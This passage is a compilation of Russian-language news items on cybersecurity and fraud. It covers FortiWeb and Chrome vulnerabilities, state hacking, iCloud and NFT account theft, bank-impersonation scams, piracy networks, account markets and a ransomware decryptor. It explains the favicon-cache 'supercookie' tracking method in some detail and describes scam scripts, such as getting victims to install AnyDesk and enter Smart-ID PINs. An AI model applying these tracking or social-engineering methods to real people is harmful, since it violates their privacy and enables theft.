Две другие уязвимости связаны с переполнением буфера в стеке. Ошибка CVE-2020-29016 (6,4 по шкале CVSS v3.1) может позволить неавторизованному удаленному злоумышленнику перезаписать содержимое стека и выполнить произвольный код, отправив запрос со специально сформированным GET-параметром certname. Для исправления нужно обновить FortiWeb 6.3.x и 6.2.x до версий 6.3.6 и 6.2.4 соответственно. Уязвимость CVE-2020-29019 (оценка также 6,4) может использоваться для DoS-атаки на демон httpd с помощью запроса со специально сформированным cookie-параметром. Необходимо обновление до 6.3.8 и 6.2.4.
Четвертая уязвимость ([CVE-2020-29018](https://www.fortiguard.com/psirt/FG- IR-20-123), 5,3 по шкале CVSS v3.1) — уязвимость форматной строки (format string) — позволяет прочитать содержимое памяти, получить конфиденциальные данные, выполнить несанкционированный код или команды с помощью параметра redir. Атака реализуется удаленно. Пользователям следует обновить FortiWeb 6.3.x до версии 6.3.6.
«Наиболее опасными среди этих четырех уязвимостей являются SQL-инъекция (CVE-2020-29015) и buffer overflow (CVE-2020-29016), — рассказывает Андрей Медов. — Эксплуатация обеих ошибок не требует авторизации. Первая позволяет из-за избыточных привилегий пользователя СУБД получить хеш учетной записи администратора системы (что дает доступ к API, причем без расшифровки хеш- значения), вторая — выполнить произвольный код. Уязвимость format string (CVE-2020-29018) тоже потенциально ведет к выполнению кода, но для ее эксплуатации требуется авторизация».
Click to expand...
Источник: xakep.ru/2021/02/04/fortinet-bugs/
Оперативники Октябрьского РОВД Могилева выявили двух 17-летних девушек, которые передали данные своих банковских карт в распоряжение интернет- мошенникам.
Установлено, что 17-летняя учащаяся одного из профлицеев областного центра откликнулась в мессенджере на публикацию о быстром заработке. Анонимный собеседник предложил ей оформить на свое имя банковскую платежную карту и передать все реквизиты ему за вознаграждение. О таком способе "подработки" девушка рассказала своей однокурснице, предложив поучаствовать и ей. Обе могилевчанки выполнили условия, однако после получения необходимых данных аферисты не заплатили девушкам и перестали выходить на связь.
Следователями в отношении фигуранток возбуждено уголовное дело за незаконный оборот средств платежа.
Правоохранители отмечают, что к такой нелегальной деятельности мошенники в основном привлекают молодежь. Предоставляя доступ к своим платежным картам, человек становится пособником кибермошенников, которые в дальнейшем легализуют деньги, полученные преступным путем. За это предусмотрена уголовная ответственность.
"Элитная группа северокорейских хакеров тайно проникала в компьютерные сети одного из крупнейших российских разработчиков ракет в течение как минимум пяти месяцев прошлого года, согласно техническим данным, полученным агентством Reuters, и анализу, проведенному исследователями в области безопасности".
Детали: По данным Reuters, связанные с северокорейским правительством
группы кибершпионов ScarCruft и Lazarus тайно устанавливали незаметные
цифровые "черные ходы" в системы НПО "Машиностроение", расположенного в
подмосковном Реутове.
Изданию не удалось выяснить, были ли получены какие-либо данные в ходе взлома
и какая информация могла быть просмотрена.
Через нескольких месяцев после взлома Пхеньян объявил о некоторых достижениях
в своей программе создания баллистических ракет, однако неясно, связано ли это
со взломом.
Отмечается, что хакеры имели доступ к сетям "НПО Машиностроения" с конца 2021
до мая 2022 года.

](https://www.reuters.com/technology/north-korean-hackers-breached-top- russian-missile-maker-2023-08-07/)
An elite group of North Korean hackers secretly breached computer networks at a major Russian missile developer for at least five months last year, according to technical evidence reviewed by Reuters and analysis by security researchers.
www.reuters.com
По информации обозревателя Etherscan, компания Tether внесла в «черный список» три адреса с общей суммой депозита на $150 млн. Добавленная метка даст информацию операторам кошельков и биржам не отправлять на эти кошельки переводы, а владельцы депозита потеряют к нему доступ.
Разработчики Tether никогда не скрывали, что код их смарт-контракта позволяет лишить доступа к токенам USDT любого пользователя по их усмотрению.
Заморозке подверглись за всю историю 566 адресов, по личному желанию компании, просьбам сторонних проектов и правоохранительных органов. Последний случай связан с расследованием одной из стран, подробности которого Tether отказались называть.
Компания полностью сотрудничает властями, а также проходит с 2020-го года международный аудит обеспечительного фонда, по решению суда США. Этим объясняется «долгожительство» токена USDT, занявшего 4-е место рейтинга капитализации криптовалют.
Ближайший конкурент Tether, стартап Circle, расположился на 6-м месте с монетой USDC. Токен также полностью контролируется властями США, выдавшими лицензию на работу этой компании.
Единственным крупным «децентрализованным долларом» в топ-30 стал TerraUST, поднявшийся до 20-го места. Об этом крипторынку напомнили разработчики Terra, прокомментировавшие внесудебную блокировку активов, компанией Tether.
Житель города Ла Пуэнт в Лос-Анджелесе смог взломать тысячи аккаунтов iCloud и собрать в общей сложности более 620 тыс. фотографий и видеозаписей интимного характера.
Правоохранители уже вычислили злоумышленника и предъявили ему обвинения. 40-летний Хао Ку Чи признал себя виновным по четырём статьям, включая несанкционированный доступ к устройству.
Оказалось, что находчивый хакер выдавал себя за сотрудника службы поддержки Apple, что позволяло ему в электронной переписке с жертвами склонять их к выдаче Apple ID и пароля от него.
В итоге Чи получил доступ к аккаунтам как минимум 306 пользователей, большую часть которых представляли девушки. Как отметил сам обвиняемый, взлом около 200 учётных записей ему заказали незнакомые люди в Сети.
Действуя под псевдонимом «icloudripper4you», Чи предлагал свои услуги по проникновению в аккаунты iCloud. Правоохранителям он признался, что несанкционированный доступ был нужен для кражи фотографий и видеозаписей.
Также подозреваемый подчеркнул, что опасается за свою дальнейшую жизнь и карьеру и не хочет, чтобы эта история серьёзно навредила ему. Чи раскаялся и отметил, что у него есть семья.
• Source: <https://www.latimes.com/california/story/2021-08-23/icloud-photo- theft-nude-women>
Министерство юстиции США злоупотребляет судебными запретами на разглашение сведений об уголовном производстве, чтобы скрыть чрезмерные объемы запрашиваемых пользовательских данных, хранящихся в облачном хранилище Microsoft. Об этом сообщил вице-президент Microsoft по безопасности и доверию пользователей Том Берт (Tom Burt), выступая перед Юридическим комитетом Палаты представителей Конгресса США в среду, 30 июня, пишет CyberScoop.
По словам Берта, ежегодно компания получает от 2,4 тыс. до 3,5 тыс. судебных запретов на разглашение сведений. Это примерно треть от общего числа запросов, получаемых Microsoft от федеральных правоохранительных органов, и число продолжает расти, поскольку все больше компаний и организаций полагаются на поставщиков облачных услуг в качестве своих виртуальных офисов.
Слушания в палате представителей Конгресса состоялись после того, как в прошлом месяце стало известно о том, что Министерство юстиции использовало судебные запреты на разглашение информации, запрашивая у Microsoft и Apple данные двух членов и некоторых сотрудников Конгресса, а также членов их семей.
«Если правоохранительные органы хотят тайно обыскать чей-то офис, им нужно изрядно потрудиться, чтобы получить на это ордер. Однако, если правоохранительные органы хотят тайно обыскать ваш виртуальный офис в облаке, им достаточно предъявить вашему облачному провайдеру шаблонный ордер и приказ о неразглашении, который не дает ему право уведомить вас», - пояснил Берт.
Получаемые Apple и Microsoft запросы от правоохранительных органов на раскрытие информации, как правило, касаются идентифицируемой информации, такой как данные об устройстве и метаданные. Хотя сюда не входит содержимое электронных писем, эти данные позволяют, например, выявить связь между определенными лицами.
Поскольку такие запросы зачастую написаны весьма расплывчато, технологические компании могут не знать, чьи данные они передают, что затрудняет понимание того, когда отклонять такие запросы, пояснил Берт.
Microsoft предложила Конгрессу ограничить бессрочные запреты на разглашение «разумным сроком», например, на 90 дней, и требовать от правительства уведомить адресата о запросе данных после истечения срока действия запрета.
• Source: <https://www.cyberscoop.com/microsoft-cloud-fourth-amendment- justice-department/>
Под процессуальным руководством Криворожской северной окружной прокуратуры, в рамках уголовного производства, начатого по ч.3 ст.190 УК Украины (мошенничество), правоохранительными органами пресечена деятельность мошеннического call-центра, через который злоумышленники под видом работников банков завладевали средствами доверчивых граждан.
По данным следствия, организаторы незаконной деятельности подыскивали неработающих молодых людей, которые выполняли роль операторов, и проводили для них инструктажи по ведению разговоров с потенциальной жертвой. В дальнейшем, используя специальное компьютерное оборудование и сведения о клиентах банков, злоумышленники под разными предлогами склоняли жертв предоставлять им информацию о номерах карточек с указанием CVV-кода, что позволяло мгновенно перевести средства на электронный кошелек мошенников. Также граждан склоняли к переводу средств на «резервный расчетный счет». В дальнейшем денежные средства, полученные незаконным путем, конвертировались в наличную форму и распределялись между членами преступной группы.
Во время проведения обысков в арендованном помещении в Кривом Роге правоохранителями изъято 25 системных блоков, мобильные телефоны, Черновая документация и тому подобное.
Досудебное расследование в указанном уголовном производстве осуществляется СВ Отделение полиции №3 Криворожского районного управления полиции ГУНП в Днепропетровской области.
Уже третья уязвимость нулевого дня в этом году этом году была исправлена с релизом Chrome 89.0.4389.90 для Windows, Mac и Linux.
Проблема получила идентификатор [CVE-2021-21193](https://cve.mitre.org/cgi- bin/cvename.cgi?name=CVE-2021-21193) и была обнаружена анонимным исследователем на прошлой неделею. Уязвимость описывается как серьезный use- after-free баг в опенсорсном движке для рендеринга Blink, разработанном инженерами Chromium при участии Google, Facebook, Microsoft и других.
Эксплуатация этой 0-day уязвимости может привести к выполнению произвольного кода в системах с уязвимыми версиями Chrome.
Хотя разработчики Google сообщают, что проблема уже находится под атаками, никакими подробностями относительно этого компания не делится.
«Доступ к информации об уязвимостях и ссылкам может быть ограничен до тех пор, пока большинство пользователей не установит исправление. Кроме того, если ошибка существует в сторонней библиотеке, от которой аналогичным образом зависят другие проекты, и она еще не исправлена, мы можем придерживаться аналогичных ограничений», — традиционно для таких случаев сообщает Google.
Click to expand...
Напомню, что ранее в 2021 году инженеры Google исправили две другие уязвимости нулевого дня в Chrome:
Источник: xakep.ru/2021/03/15/blink-0day/
Полиция Санкт-Петербурга устанавливает личности мошенников, которым 70-летняя пенсионерка перевела более 20 млн рублей.
В ведомстве рассказали, что 3 марта в полицию Фрунзенского района обратилась 70-летняя жительница СНТ «Отрадное». Она сообщила, что в период с 24 ноября по 3 февраля ей неоднократно звонил неизвестный, убеждая в том, что на ее банковском счету и с ее недвижимостью якобы производятся мошеннические действия, потому ей необходимо продать имущество, а все вырученные деньги перевести на «безопасный счет».
В итоге пенсионерка поверила неизвестному и перевела на указанный счет 21 340 000 рублей. По факту преступления возбудили уголовное дело по статье о мошенничестве (ч. 4 ст. 159 УК РФ).
sc: iz.ru/1659650/2024-03-04/pensionerka-iz-peterburga-otdala-moshennikam- bolee-20-mln-rublei
Медицинская организация из Орегона, недавно заявившая о взломе и утечке данных, случайно дала понять, что, по мнению ФБР, хак-группа HelloKitty (FiveHands), стоящая за одноименной малварью, действует с территории Украины.
Как правило, правоохранительные органы не раскрывают собранную информацию о хакерских группах, пока идет процесс собора доказательств, наблюдение и пока не будут организованы аресты. В противном случае подозреваемые могут уничтожить улики или укрыться в странах, с которыми у США нет договоров об экстрадиции. Но на этот раз «утечка» произошла не по вине сами правоохранителей.
Взломанная недавно компания Oregon Anesthesiology Group («Орегонская группа анестезиологов») сообщила в официальном пресс-релизе:
«21 октября ФБР уведомило OAG об аресте учетной записи, принадлежащей украинской хакерской группе HelloKitty, которая содержала файлы пациентов и сотрудников OAG. ФБР считает, что HelloKitty воспользовалась уязвимостью в стороннем брандмауэре, что позволило хакерам получить доступ к нашей сети».
Click to expand...
Хотя вымогатель HelloKitty, также известный как FiveHands, активен с января 2021 года, подробности о возможном местонахождении его операторов ранее не раскрывались. Упоминаний об этом не было ни в предупреждениях CISA и FBI IC3, ни в многочисленных отчетах ИБ-компаний, включая [NCC Group](https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new- fivehands-ransomware-variant/), [Cado Security](https://www.cadosecurity.com/punk-kitty-ransom-analysing-hellokitty- ransomware-attacks/), [Malwarebytes](https://blog.malwarebytes.com/threat- spotlight/2021/03/hellokitty-when-cyberpunk-met-cy-purr-crime/), Palo Alto Networks, [SentinelOne](https://www.sentinelone.com/labs/hellokitty-ransomware-lacks- stealth-but-still-strikes-home/), и [Mandiant](https://www.mandiant.com/resources/unc2447-sombrat-and-fivehands- ransomware-sophisticated-financial-threat).
Напомню, что данная группировка известна в основном благодаря взлому CD Projekt Red, произошедшему в начале текущего года. В настоящее хакеры все еще активны и продолжают заниматься вымогательскими атаками.
Теперь в России и СНГ компания будет представлена под брендом F.A.C.C.T.
Российские акционеры и топ-менеджеры выкупили активы международной компании по кибербезопасности Group-IB в России, сообщила компания. Новые владельцы сохранят контракты с российскими клиентами, а также продукты и технологии, разработанные в стране.
Теперь бизнес будет развиваться под новым брендом F.A.С.С.T. (Fight Against Cybercrime Technologies), который будет ориентирован на рынок России и СНГ. В дальнейшем Group-IB будет представлена только на международном рынке, полностью этот процесс завершится до конца 2023 года.
Руководить новой компанией будет Валерий Баулин, который ранее занимал позицию регионального директора в Group-IB.
Решение создать полностью автономную структуру, управляемую российским менеджментом и ориентированную на рынок России и СНГ, было принято в рамках диверсификации бизнеса Group-IB, начатой в июле 2022 года.
В ходе финального этапа разделения активов, Дмитрий Волков, сооснователь и CEO
Group-IB, продал свою долю Валерию Баулину, генеральному директору F.A.С.С.T.,
и вышел из состава акционеров. Однако основным акционером российского юрлица
под новым брендом F.A.С.С.T. по-прежнему остается основатель Group-IB Илья
Сачков. Сумма сделки не разглашается.
Структура собственности российской компании F.A.C.C.T. следующая: 37,5% —
Сачков, 25% — «Альтера Капитал», 15% — Алексей Козырев, 12,5% — «Киберинвест»,
10% — Валерий Баулин (генеральный директор F.A.C.C.T.).
source: facct.ru/media-center/press-releases/facct/
???? Украинский лидер Владимир Зеленский вместе с Министром обороны Украины Андреем Тараном прибыли в Пентагон, штаб-квартиру Министерства обороны США для обсуждения вопросов двухстороннего сотрудничества с Вашингтоном.
В ходе переговоров двух стран, Министр обороны США Ллойд Остин подтвердил информацию о том, что Альянс продолжает поддерживать стремление Украины к членству НАТО и Вашингтон уделит должное внимание углублённому партнёрству в таких сферах как кибербезопасность и обмен разведданными.
О чём конкретно договорились две стороны пока неизвестно, но кибервойска в Украине для «сдерживания вооруженной агрессии в киберпространстве и предоставления отпора агрессору» уже создаются. Одним из основных источников угроз национальной кибербезопасности Украины названа Российская Федерация?
Опубликована реализация новой техники привязки идентификатора к конкретному экземпляру браузера. Метод основывается на особенностях обработки изображений Favicon, при помощи которых сайт определяет пиктограммы, отображаемые в закладках, вкладках и прочих элементах интерфейса браузера. В качестве области хранения используется кэш Favicon, который выступает в роли "Supercookie".
Изображения Favicon сохраняются браузерами в отдельном кэше, который не пересекается с другими кэшами, является общим для всех режимов работы и не очищается штатными средствами очистки кэша и истории посещений. Данная особенность позволяет использовать идентификатор даже при работе в режиме инкогнито и затрудняет его удаление. На идентификацию с использованием предложенного метода также не влияет применение VPN и дополнений для блокировки рекламы.
В основе метода идентификации лежит то, что на стороне сервера можно определить открывал ли ранее пользователь страницу через анализ информации о загрузке Favicon - если браузер не запросил указанное в параметрах страницы изображение Favicon, то страница загружалась ранее и картинка показана из кэша. Так как браузеры позволяют задавать свой Favicon для каждой страницы имеется возможность кодирования полезной информации через последовательный проброс пользователя на несколько уникальных страниц.
Чем больше редиректов в цепочке, тем больше идентификаторов можно определить (число идентификаторов определяется по формуле 2^N, где N - число редиректов). Например, в два редиректа могут адресовать 4 пользователей, 3 - 8, 4 - 16, 10
Метод подразумевает работу в двух режимах - записи и чтения. Режим записи осуществляет генерацию и сохранение идентификатора для пользователя, впервые обратившегося к сайту. Режим чтения осуществляет чтение ранее сохранённого идентификатора. Выбор режима зависит от запроса файла Favicon для основной страницы сайта - если картинка запрошена, значит данные не прокэшированы и можно предположить, что пользователь не обращался к сайту ранее или содержимое кэша устарело. По данным исследователей, через указание HTTP-заголовка Cache- Control можно добиться нахождения Favicon в кэше сроком до одного года.
В режиме чтения при открытии сайта пользователь по цепочке перенаправляется на предопределённые страницы со своими Favicon (например, "demo.supercookie.me/t/50fd23e6:9bpZVrAwOmieUkMPkAeG"), а HTTP-сервер анализирует, какие из Favicon запрошены с сервера, а какие показаны без обращения к серверу из кэша. Наличие запроса кодируется как "0", а отсутствие, как "1". Для того, чтобы идентификатор сохранился и при будущих обращениях, в ответ на запросы Favicon выводится 404 код ошибки, т.е. при следующем открытии сайта браузер попытается загрузить эти Favicon вновь.
В режиме записи в цикле редиректов для страниц, кодирующих "1", выдаётся корректный ответ с Favicon, оседающий в кэше браузера (при повторном прохождении цикла данные Favicon будут отдаваться из кэша, без обращения к серверу), а для страниц кодирующих "0" - 404 код ошибки (при повторном цикле редиректа данные страницы будут запрошены вновь).
Метод работает в Chrome, Safari, Edge и частично в Firefox. В Firefox для Linux использованию Favicon в качестве Supercookies мешает особенность, из-за которой браузер вообще не кэширует Favicon. Интересно, что авторы метода идентификации уведомили разработчиков Firefox о данной особенности около года назад, указав на наличие ошибки в работе кэша, но не упомянув о своей работе и о том, что исправление ошибки приведёт к возможности идентификации пользователей. Дополнительно можно напомнить, что начиная с Firefox 85 в браузер добавлен режим сегментирования сети (Network Partitioning), позволяющий блокировать методы отслеживания перемещений, манипулирующие извлечением информации из различных браузерных кэшей.
Проверить подверженность браузера предложенному методу идентификации можно на данной странице: https://demo.supercookie.me/
• Source: https://github.com/jonasstrehle/supercookie
• Source: https://www.cs.uic.edu/~polakis/papers/solomos-ndss21.pdf
Издание The Record сообщает, что в последние дни пользователи Nifty Gateway, торговой площадки для покупки и продажи невзаимозаменяемых токенов (NFT, non- fungible token), принадлежащий Gemini, жалуются в социальных сетях на взлом своих учетных записей. Пострадавшие говорят, что у них похитили произведения цифрового искусства, которые стоят тысячи долларов.
__https://twitter.com/x/status/1371347900748460034
Это один из первых известных случаев кражи цифрового искусства, но рост интереса к NFT свидетельствует о том, что это вряд ли будет последний подобный инцидент. Дело в том, что только в прошлом году рынок NFT вырос почти на 300% и сейчас оценивается примерно в 250 000 000 долларов, что делает его привлекательной целью для злоумышленников.
Согласно многочисленным жалобам жертв, похитители взламывали действующие учетные записи пользователей, вели переговоры о продажах через Discord, а затем бесплатно передавали украденные NFT покупателям на Nifty Gateway. В некоторых случаях хакеры использовали банковские карты жертвы, привязанные к аккаунту, для покупки и последующей продажи NFT, ранее не принадлежавших пострадавшим.
Публично доступные записи об аукционах на Nifty Gateway показывают, что покупатели зачастую быстро перепродавали ворованные NFT, иногда опуская их первоначальную цену в несколько раз (на несколько тысяч долларов), чтобы подстегнуть продажи. Судя по всему, преступники и их посредники надеялись быстро отмыть краденое с помощью цепочки полулегальных транзакций, тем самым затруднив расследование для Nifty Gateway.
Представители Nifty Gateway уже сообщили, что им известно о происходящем, но подчеркивают, что сама платформа не скомпрометирована, а от атак пострадало «небольшое количество» пользователей, чьи ученые записи были взломаны другими путями.
__https://twitter.com/x/status/1371479363611426827
«Ни для одной из пострадавших учетных записей не была включена 2ФА, и доступ к ним был получен с использованием действительных учетных данных», — гласит заявление компании.
Click to expand...
Администрация Nifty Gateway призывает пользователей осуществлять транзакции исключительно через торговую площадку компании, а также использоваться двухфакторную аутентификацию, которая не является обязательной на сайте.
Пока неясно, собирается ли Nifty Gateway помогать пострадавшим пользователям в вопросе возвращения украденных произведений искусства. Судя по сообщениям пользователей, пока вернуть похищенные NTF и оспорить случившееся им не удалось.
Источник: xakep.ru/2021/03/16/nifty-gateway/
Group-IB, оценила рынок интернет-пиратства в России в 2020 году в $59 млн, что на 7% ниже показателей 2019 года. Пираты так и не смогли восстановить базу видеоконтента после ликвидации «Большой тройки» CDN, потеряли на рекламе и вступили в борьбу за зрителя с легальными онлайн-кинотеатрами, нарастившими аудиторию в условиях пандемии. При этом злоумышленники все-таки нашли способ, как обойти антипиратский меморандум.
И сервер гнется и скрипит
В «ковидный» 2020 год общая аудитория легальных видеосервисов, по данным «ТМТ Консалтинг», по сравнению с предыдущим годом выросла на 17%, до 63 млн зрителей, а сам рынок официальных онлайн-кинотеатров увеличился на 66% до 27,8 млрд руб.
Росло и желание россиян посмотреть «пиратку» — количество запросов в популярных поисковых системах на просмотр бесплатных фильмов и сериалов по итогам года выросло на 12% и составило 11,8 млрд (в 2019 году было 10,5 млрд). Апрель 2020 года и вовсе поставил абсолютный исторический рекорд по числу намерений бесплатно посмотреть пиратские фильмы — 1,4 млрд. Из-за большого наплыва зрителей серверы пиратов даже не выдерживали нагрузок.
Несмотря на рост интереса к «пиратке», теневой рынок видео-контента в прошлом году продолжил сжиматься, потеряв 7%: с $63,5 млн. в 2019 году он достиг отметки $59 млн в 2020 году. Летом Group-IB выпустила исследование «С блэкджеком и шлюпками», в котором назвала основными бенефициарами рынка интернет-пиратства онлайн-казино и букмейкерские конторы. Именно они спонсируют нелегальное копирование кинопремьер и сериалов, переводы на несколько языков студиями озвучивания, а после публикации ворованного контента размещают в пиратских онлайн-кинотеатрах рекламные баннеры, промокоды и ссылки для привлечение новых игроков. Интерес правоохранительных органов, финансовых учреждений и регуляторов к теневым финансовым потокам принес результат — интерес рекламодателей к пиратке начал падать: средний CPM ( Cost-Per-Mille, цена за 1000 показов в рекламной кампании) за год снизился примерно на 16% c $6 до $5 по сравнению с показателями 2019 года.
CDN «второй волны»
К середине 2020 года на смену трем крупнейшим пиратским видеобалансерам (CDN) — Moonwalk, HDGO и Kodik, ликвидированным в 2019 году, пришли CDN «второй волны»: Collaps, HDVB, VideoCDN, Videoframe, Bazon, Ustore, Alloha, Protonvideo. Однако даже сейчас база нелегального видеоконтента этих восьми крупнейших CDN содержит лишь 50% от объемов «Большой тройки», снабжавших 75 000 фильмами и сериалами до 90% пиратских онлайн-кинотеатров России и СНГ.
Очередной технологической новинкой, взятой на вооружение пиратами, стала интеграция видеобалансеров с полностью автоматизированными онлайн- кинотеатрами. Первым массовым прототипом стал скрипт Cinemapress, на базе которого в 2018-2019 гг появилось около 400 пиратских онлайн-кинотеатров. В апреле 2020 года на смену устаревшему проекту Cinemapress пришел Yobobox c 250 доменами, который в отличие от предшественника полностью интегрирован с одним из крупнейших CDN — Collapse, и предлагает бесплатный доступ ко всей базе видеоконтента.
Поисковик «Яндекс» по-прежнему остается главным источником для пиратских онлайн-кинотеатров, на него приходится в среднем до 90% трафика, хотя по состоянию на начало ноября 2020 г этот показатель снизился на 5 процентных пунктов по сравнению с уровнем 2019 г. Оставшиеся 10% обеспечивают другие поисковики (на Google приходится до 2%), соцсети, мессенджеры, надстройки в браузерах и прямые переходы. Кроме того, тенденция ускорения индексирования новых ссылок поисковым ботом «Яндекса» и методы автоматизации, которые используют пираты, могут нивелировать эффект удаления из поисковой выдачи без применения систем высокочастотного мониторинга.
Особую тревогу у экспертов вызывает тот факт, что в 2020 году пираты научились оперативно отслеживать удалённые при помощи антипиратского меморандума ссылки и в автоматическом режиме генерировать новые дубли (с другим URL), что значительно снижает эффективность борьбы. Напомним, что подписанный в 2018 году антипиратский меморандум, с участием «Яндекса», Mail.Ru, Rambler, «Первого канала», ВГТРК, «СТС Медиа», «Газпром-медиа», обязывал поисковики удалять ссылки на страницы с пиратским контентом из результатов выдачи по поисковым запросам пользователей, и до недавнего времени являлся эффективным средством противодействия интернет-пиратству.
В 2020 году пираты, как и легальные онлайн-кинотеатры существенно увеличили аудиторию, но не смогли извлечь из этого максимальной выгоды. Мы видим, как пережив падение „большой тройки“ CDN, пираты восстанавливают свои технические мощности и усиливают противодействие правообладателям. Некоторые из них, используя „мутирующие ссылки-дубли“, смену домена и децентрализованные CDN, нашли способы, как обойти антипиратский меморандум, полностью обесценив попытки ручного регулирования и методы борьбы с пиратством, актуальные еще несколько лет назад.
Эксперты Group-IB уверены, что классического мониторинга и блокировки уже недостаточно — необходимо выявлять и блокировать инфраструктуру преступных групп, используя автоматизированную систему для поиска и устранения цифровых рисков, база знаний которой ежедневно дополняется данными об инфраструктуре, тактике, инструментах и новых схемах пиратов.
В среду, 30 июня, было зарегистрировано несколько случаев мошенничества в разных уголках Эстонии.
Таллинн и Харьюмаа
30 июня было начато делопроизводство, когда действующее в части города Пыхья- Таллинн предприятие из-за возможного мошенничества со счетом перевело более 1800 евро не на счет своего партнера, как полагали, а на неизвестный счет.
Проживающий в Ласнамяэ пострадавший нашел в интернете рекламу инвестирования в криптовалюту и оставил свои контакты. С ним связались и проинструктировали, как делать переводы на разные счета. Ущерб более 8100 евро.
Жительнице Пыхья-Таллинна позвонили с неизвестного номера мобильного телефона и представились сотрудником Swedbank. Женщине сообщили, что с ее счета была попытка снятия денег и для активирования защитной программы требуется ввести ПИН-коды mobiil-ID. Во время беседы женщине позвонили из Swedbank с номера 6310310 и сказали, что на общается с мошенниками, которые пытаются снять со счета 640 евро. Женщина прервала этот разговор, а позже обнаружила, что со счета пропало 640 евро.
Мнимые работники Swedbank попросили ввести ПИН-коды Smart-ID для остановки подозрительных сделок и жителей Хааберсти и Мустамяэ, с чьих счетов сняли, соответственно, 310 и 330 евро.
В волости Сауэ пострадавший нашел в газете объявление об укладке брусчатки и сделал предлагавшему услугу человеку предоплату в сумме 400 евро. Позже пострадавший обнаружил, что за предложением услуги скрывался мошенник, который уже ранее наказывался за подобные деяния.
Ида-Вирумаа
Два делопроизводства, связанных с мошенничествами под предлогом звонка из банка, были начаты вчера в Нарвском отделении полиции. 49-летней женщине позвонили якобы из банка и рассказали о сомнительных сделках, которые надо быстро заблокировать. Для этого ее попросили установить программу Anydesk и ввести ПИН-коды Smart-ID, что женщина и сделала. Со счета сняли 270 евро.
Мнимый сотрудник банка позвонил также 75-летней нарвитянке с той же легендой, также просили установить программу Anydesk и ввести ПИН-коды Smart-ID. Со счета пропало 9790 евро.
Йыхвиское отделение полиции начало делопроизводство о мошенничестве, когда на имя проживающей в Кохтла-Ярве 66-летней женщины без ее ведома был взят кредит и вместе с ее деньгами, находившимися на счету, перевели на неизвестный счет. Ущерб 6000 евро.
Сотрудники УБК ГУ МВД России по городу Санкт-Петербургу и Ленинградской области задержали двоих жителей Московского региона. Они подозреваются в дистанционном мошенничестве под видом инвестирования в покупку криптовалюты.
«По предварительным данным, с января 2022 года злоумышленники вели в сети Интернет активную рекламу «авторского» курса для криптоинвесторов, где рассказывали о якобы успешных финансовых операциях и сверхприбыли. В действительности никакими специальными познаниями в данной области молодые люди не обладали, а огромное количество подписчиков и положительных отзывов было результатом использования интернет-ботов.
Вложенные в бизнес-проект деньги клиентов похищались, а все операции с электронными валютами на самом деле проводились на биржевых симуляторах. Эти программы имитировали работу крупнейших криптобирж и представляли собой их демоверсии. Они отображали информацию о том, что инвестированные средства якобы приносят доход», – рассказала официальный представитель МВД России Ирина Волк.
В ходе проведенных по месту проживания задержанных обысков полицейскими при силовой поддержке сотрудников Росгвардии изъято 18 банковских карт, несколько сим-карт и смартфонов.
«Следователем СУ УМВД России по Центральному району г. Санкт-Петербурга возбуждено уголовное дело по признакам преступления, предусмотренного частью 2 статьи 159 УК РФ. Фигурантам избрана мера пресечения в виде заключения под стражу.
В настоящее время установлена возможная причастность задержанных к совершению порядка 40 преступлений в отношении жителей нескольких регионов России», – сообщила Ирина Волк.
Цена страницы ВКонтакте может достигать 249,3 тыс. руб., а в Telegram — 390 тыс. руб.
Платформы и сервисы, специализирующиеся на продаже активных страниц в российских и зарубежных соцсетях, зафиксировали трех-четырехкратный рост спроса на такие аккаунты в 2023 году, а также почти двукратное увеличение числа продавцов.
По версии торговых площадок, причиной этого стало усиление интереса россиян к анонимности в интернете, но эксперты рекламной сферы и владельцы популярных пабликов в соцсетях считают, что аккаунты часто применяют для политических манипуляций и отправки спам-сообщений. Модераторы соцсетей заявляют, что блокируют такие аккаунты. Но их количество не снижается.
Представитель сервиса Buy-accs сообщил, что спрос на аккаунты в соцсетях за первое полугодие 2023 года вырос в 3-4 раза по сравнению с аналогичным периодом 2022 года. По словам представителя, больше всего спрос касается “ВКонтакте” и заблокированных Twitter*, Instagram** и Facebook**. Кроме того, в этом году набрали популярность многие иностранные аккаунты VPN-сервисов, которые еще не заблокированы в России. Конкретные цифры в сервисе не называют.
По данным магазина 4Cheat, количество предложений о продаже Telegram-аккаунтов за это время увеличилось в 2 раза, а предложений купить активную страницу «ВКонтакте» — на 50%. Годовой оборот всего рынка (с июня 2022 по июнь 2023 года) в 4Cheat составил около 10 млрд руб.
В Buy-accs полагают, что на рост спроса на покупку аккаунтов повлияло усиление интереса россиян к анонимности в интернете. По их данным, люди часто заходят в соцсети с анонимных аккаунтов, оставляя свои заблокированные или потерянные страницы.
Представитель Buy-accs добавил, что многие покупают аккаунты для регистрации на форумах или других сайтах. Согласно данным Buy-accs, цена аккаунта «ВКонтакте» варьируется от 18 руб. до 249,3 тыс. руб., а в Telegram — от 18 коп. до 390 тыс. руб.
По словам источника, цена страницы «зависит от ее характеристики, степени обработки, на цену также влияет и общая инфляция в совокупности со сложностью процесса создания аккаунтов». Например, аккаунт в «ВКонтакте» раньше стоил 50 коп., а сейчас тот же самый аккаунт обойдется в 25 руб.
Что касается покупки аккаунтов с целью политических манипуляций или отправки спам-сообщений с рекламой – количество спам-ботов в комментариях в соцсетях увеличилось к концу 2022 года, пик пришелся на январь 2023 года. Спам- сообщения в основном рекламируют финансовые пирамиды или курсы по саморазвитию.
Проблема с ботами коснулась также и операторов связи. Например, на официальной странице «ВКонтакте» провайдера «Вымпелком» в комментариях боты публикуют провокационные сообщения, рекламу услуги или сомнительного заработка. В «МегаФоне» подтвердили, что тоже сталкиваются со спамом в соцсетях.
source: kommersant.ru/doc/6068791
Дешифратор был разработан в сотрудничестве с Европолом, NoMoreRansom и правоохранительными органами Цюриха.
Инструмент для дешифровки и инструкцию к нему уже можно загрузить в серверов Bitdefender. Компания утверждает, что дешифратор был разработан в сотрудничестве с правоохранительными органами Цюриха, Европолом и проектом NoMoreRansom.
Чтобы создать рабочий дешифратор, исследователям обычно нужно найти недостаток в криптографии, используемой вымогательским ПО. Однако, в этом случае процесс создания инструмента сильно ускорил арест операторов LockerGoga, так как правоохранительные органы смогли получить доступ к главным ключам, которые используются для расшифровки файлов жертв.
Как работает утилита? Все просто – дешифровщик сканирует всю файловую систему или выбранную пользователем папку, находит файлы с расширением “.locked” и автоматически выполняет расшифровку. Для того, чтобы программа сработала, компьютер должен быть подключен к интернету, а все записки о выкупе должны находиться там, где появились изначально.
